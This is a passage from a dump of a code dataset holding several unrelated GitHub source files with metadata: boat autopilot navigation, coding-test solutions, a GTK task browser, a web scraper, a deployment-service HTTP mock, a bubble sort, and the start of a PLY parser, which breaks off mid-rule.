esc in self.escs:\r\n print(msg[3:])\r\n esc.set(int(msg[3:]))\r\n\r\n elif msg[0:2] == \"2x\":\r\n try:\r\n self.heading = int(msg[2:5])\r\n print(self.heading)\r\n except:\r\n break\r\n\r\n for rudder in self.rudders:\r\n rudder.set_heading(int(self.heading))\r\n\r\n elif msg == \"0x0001\":\r\n for esc in self.escs:\r\n esc.arm()\r\n\r\n elif msg == \"0x0010\":\r\n for esc in self.escs:\r\n esc.disarm()\r\n\r\n elif msg == \"1x0000\":\r\n self.return_home()\r\n\r\n elif msg == \"1x0001\":\r\n self.start_autopilot()\r\n\r\n elif msg == \"1x0011\":\r\n self.stop_autopilot()\r\n\r\n elif msg == \"stop\" or msg == \"quit\" or msg == \"3x0000\":\r\n self.retHome = False\r\n for esc in self.escs:\r\n esc.disarm()\r\n return False\r\n\r\n\r\n\r\n # (python3.10)\r\n \"\"\"\r\n match msg:\r\n\r\n case \"0x0001\":\r\n for esc in self.escs:\r\n esc.arm()\r\n\r\n case \"0x0010\":\r\n for esc in self.escs:\r\n esc.disarm()\r\n\r\n case \"1x0000\":\r\n self.return_home()\r\n\r\n case \"1x0001\":\r\n self.start_autopilot()\r\n\r\n case \"stop\" | \"quit\":\r\n self.retHome = False\r\n for esc in self.escs:\r\n esc.disarm()\r\n return False\r\n \"\"\"\r\n \r\n recieved.remove(msg)\r\n\r\n return True\r\n\r\n\r\n\r\n def load_waypoints(self, filename : str) -> None:\r\n\r\n with open(filename, \"r\") as f:\r\n waypoints = json.load(f)\r\n for wp in waypoints:\r\n x = wp['lat']\r\n y = wp['lng']\r\n self.waypoints.append({'lat': x, 'lng': y})\r\n\r\n self.report(f\"{len(self.waypoints)} waypoints loaded!\")\r\n\r\n\r\n def get_heading(self, pos1 : dict, pos2 : dict) -> int:\r\n\r\n if (len(pos1) > 0 and len(pos2) > 0) or not pos1['lat'] == None or not pos2['lat'] == None:\r\n\r\n a = Geodesic.WGS84.Inverse(pos1['lat'], pos1['lng'], pos2['lat'], pos2['lng'])\r\n\r\n bearing = a['azi1']\r\n if bearing < 0:\r\n bearing += 360\r\n return round(bearing, 2)\r\n else:\r\n return False\r\n\r\n\r\n def get_distance(self, pos1 : dict, pos2 : dict) -> float:\r\n\r\n if (len(pos1) > 0 and len(pos2) > 0) or not pos1['lat'] == None or not pos2['lat'] == None:\r\n a = Geodesic.WGS84.Inverse(pos1['lat'], pos1['lng'], pos2['lat'], pos2['lng'])\r\n return round(a['s12'], 2)\r\n else:\r\n return False\r\n\r\n\r\n def check_if_close(self, pos : dict) -> bool:\r\n\r\n if self.position:\r\n distance = self.get_distance(self.position, pos)\r\n if distance <= 2: # 2m^2\r\n return True\r\n return \r\n \r\n \r\n def save_data(self, position, depth, heading, image):\r\n\r\n if not depth == -1 and image.any():\r\n with open(\"saved_data.json\", \"a\") as f:\r\n f.write(f\"{self.sample_ticker},{position},{depth},{heading}\\n\")\r\n cv2.imwrite(f\"samples/{self.sample_ticker}.jpg\", image)\r\n print(f\"[SAVE DATA]\\t{self.sample_ticker},{position},{depth},{heading}\")\r\n self.sample_ticker += 1\r\n\r\n\r\n def show_simulated_route(self) -> None:\r\n\r\n for pos, wp in enumerate(self.waypoints[:-1]):\r\n heading = self.get_heading(wp, self.waypoints[pos+1])\r\n distance = self.get_distance(wp, self.waypoints[pos+1])\r\n print(f\"[AUTOPILOT SIMULATION] {pos}. Heading: {heading}, Distance: {distance}m\")\r\n\r\n\r\n def return_home_(self) -> None:\r\n\r\n self.retHome = True\r\n last_time = time.time()\r\n print_ = False\r\n\r\n while not self.check_if_close(self.waypoints[0]):\r\n if not self.retHome: break\r\n if time.time() - last_time > 1:\r\n print_ = True; last_time = time.time()\r\n\r\n heading = self.get_heading(self.position, self.waypoints[0])\r\n distance = self.get_distance(self.position, self.waypoints[0])\r\n\r\n self.offset = int(heading - self.heading)\r\n\r\n #for esc in self.escs:\r\n # esc.distance_compansation(distance)\r\n\r\n for rudder in self.rudders:\r\n rudder.heading_compansation(self.offset)\r\n\r\n if print_: print(f\"[AUTOPILOT] ** RETURNING HOME ** Distance: {distance}\"); print_ = False\r\n\r\n \r\n def return_home(self) -> None:\r\n\r\n threading._start_new_thread(self.return_home_, ())\r\n\r\n\r\n def start_autopilot_(self) -> None:\r\n\r\n self.report(\"Starting autopilot ...\"); time.sleep(1.5)\r\n \r\n last_time = time.time()\r\n print_ = False\r\n\r\n for i, waypoint in enumerate(self.waypoints):\r\n while not self.check_if_close(waypoint):\r\n \r\n if not self.running or not self.autopilot_running or self.retHome: break\r\n\r\n if time.time() - last_time > 1:\r\n print_ = True; last_time = time.time()\r\n\r\n heading = self.get_heading(self.position, waypoint)\r\n distance = self.get_distance(self.position, waypoint)\r\n\r\n self.offset = int(heading - self.heading)\r\n #print(f\"Heading to WP: {heading}\\tHeading: {round(self.heading, 2)}\\tOffset: {self.offset}\\tDistance: {distance}\")\r\n\r\n #for esc in self.escs:\r\n # esc.distance_compansation(distance)\r\n\r\n for rudder in self.rudders:\r\n rudder.heading_compansation(self.offset)\r\n\r\n if print_:\r\n pass\r\n #self.save_data(self.position, self.depth, self.heading, self.depthshot)\r\n print(f\"[AUTOPILOT] {i}\\tSatellites: {self.sats}\\tHeading: {self.heading}\\tOffset: {self.offset}\\tDistance: {distance}m\\tPosition: {self.position}\"); print_ = False\r\n\r\n # code for quick turn to waypoint (or not)\r\n\r\n self.report(\"Route has completed!\"); time.sleep(1.5)\r\n self.running = False\r\n\r\n self.return_home()\r\n\r\n\r\n def start_autopilot(self) -> None:\r\n\r\n self.retHome = False\r\n self.autopilot_running = True \r\n threading._start_new_thread(self.start_autopilot_, ())\r\n\r\n\r\n def stop_autopilot(self) -> None:\r\n \r\n self.autopilot_running = False\r\n\r\n\r\n#nav = Nav()\r\n#nav.load_waypoints(\"waypoints.json\")\r\n#nav.get_heading(nav.waypoints[0], nav.waypoints[1])\r\n\r\n#nav.show_simulated_route()\r\n#nav.start_autopilot()\r\n","repo_name":"DenEkteTruls/Hydromapper","sub_path":"nav/nav.py","file_name":"nav.py","file_ext":"py","file_size_in_byte":8925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15837113192","text":"#일반적으로 방향을 설정해서 이동하는 문제는 dx, dy라는 별도의 리스트를 만들어 방향을 정하는 것이 효과적이다.\nn, m = map(int, input().split())\n\nd = [[0] * m for _ in range(n)]\nx, y, direction = map(int, input().split())\nd[x][y] = 1 #현재 좌표 방문처리\n\n#전체 맵 정보를 입력받기\narray = []\nfor i in range(n):\n array.append(list(map(int, input().split())))\n\n#북, 동, 남, 서 방향 정의\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\n#왼쪽으로 회전\ndef turn_left():\n global direction\n direction -= 1\n if direction == -1:\n direction = 3\n\n#시뮬레이션 시작\ncount = 1\nturn_time = 0\nwhile True:\n #왼쪽 회전\n turn_left()\n nx = x + dx[direction]\n ny = y + dy[direction]\n #회전 후 정면에 안가본칸 존재시 이동\n if d[nx][ny] == 0 and array[nx][ny] == 0:\n d[nx][ny] = 1\n x = nx\n y = ny\n count += 1\n turn_time = 0\n continue\n else:\n turn_time += 1\n \n #네 방향 모두 갈 수 없는 경우\n if turn_time == 4:\n nx = x - dx[direction]\n ny = y - dy[direction]\n #뒤로갈수 있으면 가기\n if array[nx][ny] == 0:\n x = nx\n y = ny\n #뒤가 바다로 막혀있는 경우\n else:\n break\n turn_time = 0\n\nprint(count)\n\n","repo_name":"mark1346/coding_test_study","sub_path":"sehun/C12/P2/구현P2_E4-4.py","file_name":"구현P2_E4-4.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15750355409","text":"#!/usr/bin/env python\n\nimport gi\nimport json\nimport webbrowser\ngi.require_version('Gtk', '3.0')\n\nfrom gi.repository import Gio\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GdkPixbuf\nfrom gi.repository import GObject\n\n\norganizations = {\n 5382353857806336: \"Apertium\",\n 4814441002565632: \"BRL-CAD\",\n 6426002725011456: \"CCExtractor Development\",\n 4809822100783104: \"Copyleft Games\",\n 5129917289201664: \"Drupal\",\n 6707477701722112: \"FOSSASIA\",\n 5761416665497600: \"Haiku Inc\",\n 5186916471275520: \"KDE\",\n 4794680462016512: \"MetaBrainz Foundation\",\n 5084291717398528: \"Mifos Initiative\",\n 5452182442737664: \"MovingBlocks\",\n 5747383933599744: \"OpenMRS\",\n 5114486142795776: \"Sugar Labs\",\n 5770017069072384: \"Sustainable Computing Research Group ( SCoRe )\",\n 6025234696110080: \"Systers, an Anita Borg Institute Community\",\n 5385807011512320: \"Wikimedia\",\n 4718815233441792: \"Zulip\"\n}\n\n\nTAGS = {1: [\"img/code.svg\", \"Code\"],\n 2: [\"img/userinterface.svg\", \"User Interface\"],\n 3: [\"img/doc.svg\", \"Documentation / Training\"],\n 4: [\"img/qa.svg\", \"Quality Assurance\"],\n 5: [\"img/outreach.svg\", \"Outearch / Research\"]\n }\n\n\nclass WindowWithHeader(Gtk.Window):\n\n def __init__(self, title):\n Gtk.Window.__init__(self)\n\n self.title_bar = Header(title)\n self.set_titlebar(self.title_bar)\n self.show_all()\n\n\nclass Header(Gtk.HeaderBar):\n\n def __init__(self, title):\n Gtk.HeaderBar.__init__(self)\n\n self.set_show_close_button(True)\n self.set_title(title)\n\n\nclass Button(Gtk.Button):\n\n def __init__(self, icon_name, tooltip):\n Gtk.Button.__init__(self)\n\n icon = Gio.ThemedIcon(name=icon_name)\n image = Gtk.Image.new_from_gicon(icon, Gtk.IconSize.BUTTON)\n self.add(image)\n\n Tooltip(self, tooltip)\n\n\nclass Tooltip(Gtk.Popover):\n\n def __init__(self, button, text):\n Gtk.Popover.__init__(self)\n\n label = Gtk.Label(label=text)\n\n button.connect(\"leave-notify-event\", self._hide)\n button.connect(\"enter-notify-event\", self._show)\n\n self.set_border_width(6)\n self.set_relative_to(button)\n self.set_modal(False)\n\n self.add(label)\n\n def _show(self, event, button):\n self.show_all()\n\n def _hide(self, event, button):\n self.hide()\n\n\nclass Alert(Gtk.InfoBar):\n\n def __init__(self, text):\n Gtk.InfoBar.__init__(self)\n\n label = Gtk.Label(label=\"%s\" % text)\n label.set_use_markup(True)\n self.get_content_area().add(label)\n\n self.set_border_width(8)\n self.set_show_close_button(True)\n self.set_message_type(Gtk.MessageType.ERROR)\n\n def do_response(self, event):\n self.destroy()\n\n\nclass TasksList(Gtk.ListBox):\n\n def __init__(self):\n Gtk.ListBox.__init__(self)\n self.limit = 0\n self.total_tasks = 0\n self.showed_tasks = []\n self.filtered_tasks = []\n self.add_tasks()\n\n def clean_tasks(self):\n for task in self.get_children():\n self.remove(task)\n\n self.showed_tasks = []\n self.filtered_tasks = []\n self.limit = 0\n\n def add_tasks(self):\n f = open(\"tasks.json\", \"r\")\n tasks = json.load(f)['results']\n f.close()\n\n self.limit += 50\n self.total_tasks = len(tasks)\n\n for task in tasks:\n if task in self.showed_tasks:\n continue\n\n if len(self.showed_tasks) > self.limit:\n if len(self.showed_tasks) < self.total_tasks:\n widget = ShowMoreTasks(self)\n self.add(widget)\n break\n\n self.add(TaskInterface(task))\n self.showed_tasks.append(task)\n\n if len(self.showed_tasks) == self.total_tasks:\n widget = ShowMoreTasks(self, True)\n self.add(widget)\n\n def filter(self, text):\n for task_widget in self.get_children():\n if not text:\n task_widget.show()\n continue\n\n task = task_widget.get_children()[0]\n if isinstance(task, ShowMoreTasks):\n task_widget.hide()\n elif isinstance(task, TaskInterface):\n if text in task.task_name:\n task_widget.show()\n else:\n task_widget.hide()\n\n\nclass TaskInterface(Gtk.Box):\n\n def __init__(self, test_task):\n Gtk.Box.__init__(self, orientation=Gtk.Orientation.VERTICAL)\n\n organization_label = Gtk.Label()\n organization_label.set_text(\"%s\" %\n organizations[\n test_task[\"organization_id\"]].upper())\n organization_label.set_use_markup(True)\n organization_label.set_size_request(400, 30)\n organization_label.set_xalign(0)\n organization_label.props.margin_left = 5\n organization_label.props.margin_top = 5\n\n self.task_name = test_task[\"name\"]\n\n task_name = Gtk.Label(test_task[\"name\"])\n task_name.set_xalign(0)\n task_name.props.margin_left = 5\n task_name.props.margin_top = 5\n task_name.set_line_wrap(True)\n\n task_description_expander = Gtk.Expander(label=\"Description\")\n\n task_description = Gtk.Label(test_task[\"description\"])\n task_description.props.xpad = 30\n task_description.set_yalign(0)\n task_description.set_xalign(0)\n task_description.set_line_wrap(True)\n\n task_description_expander.add(task_description)\n\n header = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n header.pack_start(organization_label, False, False, 0)\n header.pack_end(\n Icon(days=test_task[\"time_to_complete_in_days\"]),\n False,\n False,\n 5)\n\n icon = Icon(tags=test_task[\"tags\"])\n if not icon.is_none:\n header.pack_end(icon, False, False, 5)\n\n icon = Icon(tags=test_task)\n\n icon = Icon(beginner=test_task[\"is_beginner\"])\n if not icon.is_none:\n header.pack_end(icon, False, False, 5)\n\n subheader = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n subheader.pack_start(task_name, False, False, 0)\n for cat in test_task[\"categories\"]:\n subheader.pack_end(Icon(category=cat), False, False, 5)\n\n subsubheader = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n subsubheader.pack_start(task_description_expander, True, True, 0)\n\n icon = Icon(url=test_task[\"external_url\"])\n if not icon.is_none:\n subsubheader.pack_end(icon, False, False, 5)\n self.pack_start(header, False, False, 0)\n self.pack_start(subheader, False, False, 0)\n self.pack_end(subsubheader, True, True, 10)\n\n self.show_all()\n\n\nclass ScrolledWindow(Gtk.ScrolledWindow):\n\n def __init__(self, widget):\n Gtk.ScrolledWindow.__init__(self)\n\n self.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)\n self.add_with_viewport(widget)\n self.show_all()\n\n\nclass Icon(Gtk.EventBox):\n\n def __init__(\n self,\n category=None,\n scale=24,\n days=0,\n tags=None,\n beginner=False,\n mentors=None,\n url=None):\n Gtk.EventBox.__init__(self)\n\n self.is_none = False\n img = Gtk.Image()\n path = None\n\n if category:\n path = TAGS[category][0]\n Tooltip(self, TAGS[category][1])\n\n elif days > 1:\n path = \"img/time.svg\"\n Tooltip(self, \"%d days\" % days)\n\n elif tags:\n path = \"img/tags.svg\"\n text = \"Tags:\\n\"\n for tag in tags:\n text += \" %s\\n\" % tag\n\n if text.endswith(\"\\n\"):\n text = text[:-1]\n\n Tooltip(self, text)\n\n elif beginner:\n path = \"img/beginner.svg\"\n Tooltip(self, \"Beginner task\")\n\n elif mentors:\n path = \"img/mentors.svg\"\n text = \"Mentors:\\n\"\n for mentor in mentors:\n text += \" %s\\n\" % tag\n\n if text.endswith(\"\\n\"):\n text = text[:-1]\n\n Tooltip(self, text)\n\n elif url:\n path = \"img/link.svg\"\n text = \"External URL (double click to open):\\n%s\" % url\n self.connect(\"button-press-event\", self._openlink, url)\n Tooltip(self, text)\n\n if path:\n pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_scale(\n path, scale, scale, True)\n img.set_from_pixbuf(pixbuf)\n else:\n self.is_none = True\n\n self.add(img)\n self.show_all()\n\n def _openlink(self, widget, event, url):\n if event.type == 5:\n webbrowser.open(url)\n\n\nclass ShowMoreTasks(Gtk.EventBox):\n\n def __init__(self, tasks_list, last=False):\n Gtk.EventBox.__init__(self)\n self.tasks_list = tasks_list\n\n self.label = Gtk.Label()\n if not last:\n self.label.set_text(\n \"Show more (+50) tasks!\\n-The application may work slowly-\\n(Double click)\")\n self.label.set_use_markup(True)\n self.label.set_justify(Gtk.Justification.CENTER)\n self._id = self.connect(\"button-press-event\", self.button_press)\n\n if last:\n self.label.set_text(\"End of the list. :(\")\n self.set_sensitive(False)\n\n self.add(self.label)\n self.show_all()\n\n def button_press(self, widget, event):\n if event.type == 5:\n self.disconnect(self._id)\n showed_tasks = len(self.tasks_list.showed_tasks)\n self.label.set_text(\"%d/%d\" %\n (showed_tasks, self.tasks_list.total_tasks))\n self.set_sensitive(False)\n self.tasks_list.add_tasks()\n\n\nclass SearchButton(Gtk.ToggleButton):\n\n def __init__(self, searchbar, tasks_list):\n Gtk.ToggleButton.__init__(self)\n\n self.searchbar = searchbar\n self.tasks_list = tasks_list\n\n icon = Gio.ThemedIcon(name=\"find\")\n image = Gtk.Image.new_from_gicon(icon, Gtk.IconSize.BUTTON)\n Tooltip(self, \"Search task\")\n self.add(image)\n\n searchbar.connect('search-changed', self.search_changed)\n\n def do_toggled(self):\n self.searchbar.set_search_mode(self.get_active())\n if not self.get_active():\n self.tasks_list.filter(None)\n\n def search_changed(self, widget, text):\n self.tasks_list.filter(text)\n\n\nclass SearchBar(Gtk.SearchBar):\n\n __gsignals__ = {\n 'search-changed': (GObject.SIGNAL_RUN_FIRST,\n GObject.TYPE_NONE, (GObject.TYPE_STRING,))}\n\n def __init__(self):\n Gtk.SearchBar.__init__(self)\n\n searchentry = Gtk.SearchEntry()\n searchentry.set_placeholder_text(\"Search task, by title\")\n self.connect_entry(searchentry)\n self.add(searchentry)\n\n searchentry.set_size_request(1024, -1)\n searchentry.connect(\"search-changed\", self.search_changed)\n\n def search_changed(self, widget):\n self.emit('search-changed', widget.get_text())\n","repo_name":"i5o/codein-gtk","sub_path":"widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":11285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40444124914","text":"# 21.py -- Merge Two Sorted List\n\n'''\nDescription:\nMerge two sorted linked lists and return it as a new sorted list. \nThe new list should be made by splicing together the nodes of the first two lists.\n\nExample:\nInput: 1->2->4, 1->3->4\nOutput: 1->1->2->3->4->4\n'''\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n '''\n I am not familiar with the operation with linked list,\n pay attention to this!\n '''\n def merge(self, l1, l2):\n '''\n add a third linked list to simplify.\n Iterately.\n '''\n head = cur = ListNode(0)\n while l1 and l2:\n if l1.val < l2.val:\n cur.next = l1\n l1 = l1.next\n else:\n cur.next = l2\n l2 = l2.next\n cur = cur.next\n cur.next = l1 or l2\n return head.next\n\n def merge2(self, l1, l2):\n '''\n Recursively.\n '''\n if not l1 or not l2:\n return l1 or l2\n if l1.val < l2.val:\n l1.next = self.merge2(l1.next, l2)\n return l1\n else:\n l2.next = self.merge2(l1, l2.next)\n return l2\n\n \n \n","repo_name":"Veraph/LeetCode_Practice","sub_path":"cyc/linked_list/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24303788670","text":"\"\"\"\n2×n 크기의 직사각형을 1×2, 2×1 타일로 채우는 방법의 수를 구하는 프로그램을 작성하시오.\n아래 그림은 2×5 크기의 직사각형을 채운 한 가지 방법의 예이다\n\"\"\"\nn = int(input())\nary = []\nfor i in range(n+1):\n if i == 0:\n ary.append(1)\n elif i == 1:\n ary.append(1)\n else:\n ary.append(ary[i-2] + ary[i-1])\n\nresult = ary[n]\n\nprint(result % 10007)","repo_name":"SeungGyu-Kwak/Python_Study-with-BackJoon","sub_path":"DP(동적계획)/Q_11726.py","file_name":"Q_11726.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26719683140","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\nlink = 'https://blogs.worldbank.org/search%3Ff%5B0%5D%3Dlanguage%3Aen%26f%5B1%5D%3Dtopic%3A303'\nquote_link = \"https://api.quotable.io/random\"\ndate_frmt = \"%B %d, %Y\"\noutput_frmt = \"%d %b\"\n\n\ndef get_blogs():\n r = requests.get(link)\n soup = BeautifulSoup(r.content, 'html.parser')\n s = soup.find('div', class_=\"view-content\")\n h = s.find_all('h3', class_=\"field-content\")\n div = s.find_all('div', class_=\"field-content\")\n span = s.find_all('span', class_=\"field-content\")\n\n a_links = []\n headers = []\n descrip = []\n dates = []\n dt = []\n\n for h3 in h:\n a_tag = h3.find('a') # Find the tag within each

element\n if a_tag:\n a_links.append(f\"https://blogs.worldbank.org{a_tag['href']}\")\n headers.append(a_tag.text)\n for tag in div:\n p = tag.find('p')\n if p:\n descrip.append(p.text)\n for tag in span:\n date = tag.find('time')\n if date:\n txt = date.text\n frmt_date = datetime.strptime(txt, date_frmt)\n formatted_date = frmt_date.strftime(output_frmt)\n dates.append(formatted_date)\n\n for i in range(len(a_links)):\n dt.append([headers[i], descrip[i], a_links[i], dates[i]])\n\n return dt\n\n\ndef get_quote():\n q = requests.get(quote_link).json()\n return q[\"content\"], q[\"author\"]\n","repo_name":"Mayur-Gowda/WebDev--","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"63523479","text":"\"\"\"\nSimple deploy-v2 mock\n\"\"\"\n\nimport json\nimport urllib.parse\n\nfrom httmock import urlmatch\n\nfrom .utils import handle_http_action, http_return\n\n\ndef deploy_v2(state):\n \"\"\"\n Setup mock with state\n \"\"\"\n record_all_shipments = state['deploy-v2']['record_all_shipments']\n\n @urlmatch(netloc='deploy-v2.test', method='get', path='/v1/minions/.+')\n def get_minion(url, _):\n minion_id = url.path.split('/')[-1]\n ret = handle_http_action(state, f'deploy-v2-minion-get-{minion_id}')\n if ret:\n return ret\n\n if minion_id in state['deploy-v2']['minions']:\n return http_return(body=state['deploy-v2']['minions'][minion_id])\n\n return http_return(code=404, body={'message': 'data not found'})\n\n @urlmatch(netloc='deploy-v2.test', method='put', path='/v1/minions/.+')\n def create_minion(url, request):\n minion_id = url.path.split('/')[-1]\n data = json.loads(request.body)\n ret = handle_http_action(state, f'deploy-v2-minion-create-{minion_id}')\n if ret:\n return ret\n\n data['registered'] = True\n state['deploy-v2']['minions'][minion_id] = data\n return http_return(body=data)\n\n @urlmatch(netloc='deploy-v2.test', method='post', path='/v1/minions/.+/unregister')\n def unregister_minion(url, request):\n minion_id = url.path.split('/')[-2]\n ret = handle_http_action(state, f'deploy-v2-minion-unregister-{minion_id}')\n if ret:\n return ret\n\n if minion_id in state['deploy-v2']['minions']:\n return http_return()\n\n return http_return(code=404, body={'message': 'minion not created'})\n\n @urlmatch(netloc='deploy-v2.test', method='delete', path='/v1/minions/.+')\n def delete_minion(url, _):\n minion_id = url.path.split('/')[-1]\n ret = handle_http_action(state, f'deploy-v2-minion-delete-{minion_id}')\n if ret:\n return ret\n\n if minion_id in state['deploy-v2']['minions']:\n return http_return(body=state['deploy-v2']['minions'].pop(minion_id))\n\n return http_return(code=404, body={'message': 'data not found'})\n\n @urlmatch(netloc='deploy-v2.test', method='get', path='/v1/shipments/.+')\n def get_shipment(url, _):\n shipment_id = url.path.split('/')[-1]\n ret = handle_http_action(state, f'deploy-v2-shipment-get-{shipment_id}')\n if ret:\n return ret\n\n if shipment_id in state['deploy-v2']['shipments']:\n return http_return(body=state['deploy-v2']['shipments'][shipment_id])\n\n return http_return(code=404, body={'message': 'data not found'})\n\n @urlmatch(netloc='deploy-v2.test', method='post', path='/v1/shipments')\n def create_shipment(_, request):\n data = json.loads(request.body)\n commands = '-'.join(x['type'] for x in data['commands'] if x['type'] != 'saltutil.sync_all')\n shipment_id = f'{data[\"fqdns\"][0]}-{commands}'\n\n if record_all_shipments:\n prefix = shipment_id\n suffix_num = 2\n\n while shipment_id in state['deploy-v2']['shipments']:\n suffix_num += 1\n shipment_id = f'{prefix}-{suffix_num}'\n\n ret = handle_http_action(state, f'deploy-v2-shipment-create-{shipment_id}')\n if ret:\n return ret\n\n state['deploy-v2']['shipments'][shipment_id] = data\n state['deploy-v2']['shipments'][shipment_id]['id'] = shipment_id\n state['deploy-v2']['shipments'][shipment_id]['status'] = 'done'\n\n return http_return(body=state['deploy-v2']['shipments'][shipment_id])\n\n @urlmatch(netloc='deploy-v2.test', method='get', path='/v1/jobs')\n def get_jobs(url, request):\n shipment_id = url.query.split('=')[1]\n\n if 'jobs' in state['deploy-v2'] and shipment_id in state['deploy-v2']['jobs']:\n return http_return(body={'jobs': state['deploy-v2']['jobs'][shipment_id]})\n\n return http_return(code=404, body={'message': 'jobs not found for shipment_id=' + shipment_id})\n\n @urlmatch(netloc='deploy-v2.test', method='get', path='/v1/jobresults')\n def get_jobresults(url, request):\n qp = urllib.parse.parse_qs(url.query)\n ext_job_id = qp['extJobId'][0]\n fqdn = qp['fqdn'][0]\n\n if 'jobresults' not in state['deploy-v2']:\n return http_return(code=404, body={'message': 'jobresults not intialized'})\n\n for jr in state['deploy-v2']['jobresults']:\n if jr['fqdn'] == fqdn and jr['extID'] == ext_job_id:\n return http_return(body={'jobResults': [jr]})\n\n return http_return(\n code=404, body={'message': 'jobresults not found for ext_job_id=' + ext_job_id + ', fqdn=' + fqdn}\n )\n\n return (\n get_minion,\n create_minion,\n delete_minion,\n get_shipment,\n create_shipment,\n unregister_minion,\n get_jobs,\n get_jobresults,\n )\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"cloud/test/mocks/deploy_v2.py","file_name":"deploy_v2.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37603135398","text":"import numpy as np\n\nimport viscojapan as vj\n\ndip_patch_size = 4\nstrike_patch_size = 4\nfault_file = 'fault_bott80km.h5'\n\nslip = vj.inv.test.gen_checkerboard_slip_from_fault_file(\n fault_file,\n dip_patch_size = dip_patch_size,\n strike_patch_size = strike_patch_size)\n\nslip *= 2\n\n\nflt_reader = vj.fm.FaultFileReader(fault_file)\nlats = flt_reader.LLats_mid\nlons = flt_reader.LLons_mid\n\n \nwith open('_checkerboard_slip.txt','wt') as fid:\n for lon, lat, s in zip(np.nditer(lons),\n np.nditer(lats),\n np.nditer(slip),\n ):\n fid.write('%f %f %f\\n'%(lon,lat,s))\n\n","repo_name":"zy31415/viscojapan","sub_path":"agu-paper/checkerboard_test/gmt/gen_checkerboard_slip.py","file_name":"gen_checkerboard_slip.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"73849064553","text":"def bubble(l):\n rez = []\n r = True\n while r:\n r = False\n for i in range(len(l) - 1):\n if l[i] > l[i + 1]:\n l[i], l[i + 1] = l[i + 1], l[i]\n r = True\n return l\n\n\nprint(bubble([2,0,2,1,1,0]))\n","repo_name":"alex-radchenko-github/codewars-and-leetcode","sub_path":"codewars/7kata/Bubble Sort.py","file_name":"Bubble Sort.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23950823096","text":"### PAL Grammar rules Parser\n\nimport ply.yacc as yacc\n\n# Get the token map from the lexer. This is required.\nfrom PALLexer import tokens\nfrom random import randint\n#Global key value dictionaries\n#key = Organism ID value = max value of organisms in the model\norgmax = {}\n#key = Organism ID value = initial value of organisms in the model\norginitial = {}\n\n#key = Organism ID value = list of dictionaries key = action name and value = population operator\norgpopactions = {}\n#key = Organism ID value = list of dictionaries key = action name and value = list [action type,operator,different operator,otherorgid]\norgpopactionnames = {}\n\n#key = Organism ID value = list of internal species of that organism\norgspecies = {}\n\n#key = internal species ID value = list of actions of that species\nspeciesactions = {}\n#key = Organism ID value = list of species actions of that organism\norgactions = {}\n\n#key = internal species ID value = list of parameters of that species\norgparameters = {}\n\n#key = Organism ID value value key species id value parameter expression\norginitialresets = {}\n\n\n###Starting rule which specifies the parts of a PAL model\n##def p_palmodel_1(p):\n## 'palmodel : maxpoplist modelcomponent biospeciesbehaviours parameters actionrates organisms populations'\n## p[0] = p[4] + '\\n' + p[5] + '\\n' + p[3] + '\\n' + addonandoffspecies() + '\\n' + p[6]\n\ndef p_palmodel_1(p):\n 'palmodel : maxpoplist modelcomponent populations organisms initialresets biospeciesbehaviours parameters actionrates'\n p[0] = p[7] + '\\n'+ addintialresetparasandactionrates() + '\\n' + p[8] + '\\n' + p[6] + '\\n' + p[3] + '\\n' + p[4]\n\n#initial reset rules\ndef p_intialresets_1(p):\n 'initialresets : initialresets initialreset'\n p[0] = p[1] + p[2]\n\ndef p_intialresets_2(p):\n 'initialresets : initialreset'\n p[0] = p[1]\n\ndef p_initialreset(p):\n 'initialreset : IDENTIFIER IDENTIFIER EQUALS expression SEMICOLON'\n createorginitialresetdictionary(p)\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3] + ' ' + p[4] + ' ; ' + '\\n'\n\n#parameter rules\ndef p_parameters_1(p):\n 'parameters : parameters parameter'\n p[0] = p[1] + p[2]\n\ndef p_parameters_2(p):\n 'parameters : parameter'\n p[0] = p[1]\n\ndef p_parameter(p):\n 'parameter : IDENTIFIER EQUALS expression SEMICOLON'\n p[0] = addorganismidtoparameters(p)\n\n#action rate rules\ndef p_actionrates_1(p):\n 'actionrates : actionrates actionrate'\n p[0] = p[1] + p[2]\n\ndef p_actionrates_2(p):\n 'actionrates : actionrate'\n p[0] = p[1]\n\ndef p_actionrate(p):\n 'actionrate : IDENTIFIER COLON expression SEMICOLON'\n p[0] = addorganismidtoactions(p)\n\n#same expression rule used in parameters and actionrates\ndef p_expression_power(p):\n 'expression : expression POWER term'\n p[0] = p[1] + p[2] + p[3]\n\ndef p_expression(p):\n '''expression : expression PLUS term\n | expression MINUS term '''\n if p[2] == '+':\n p[0] = 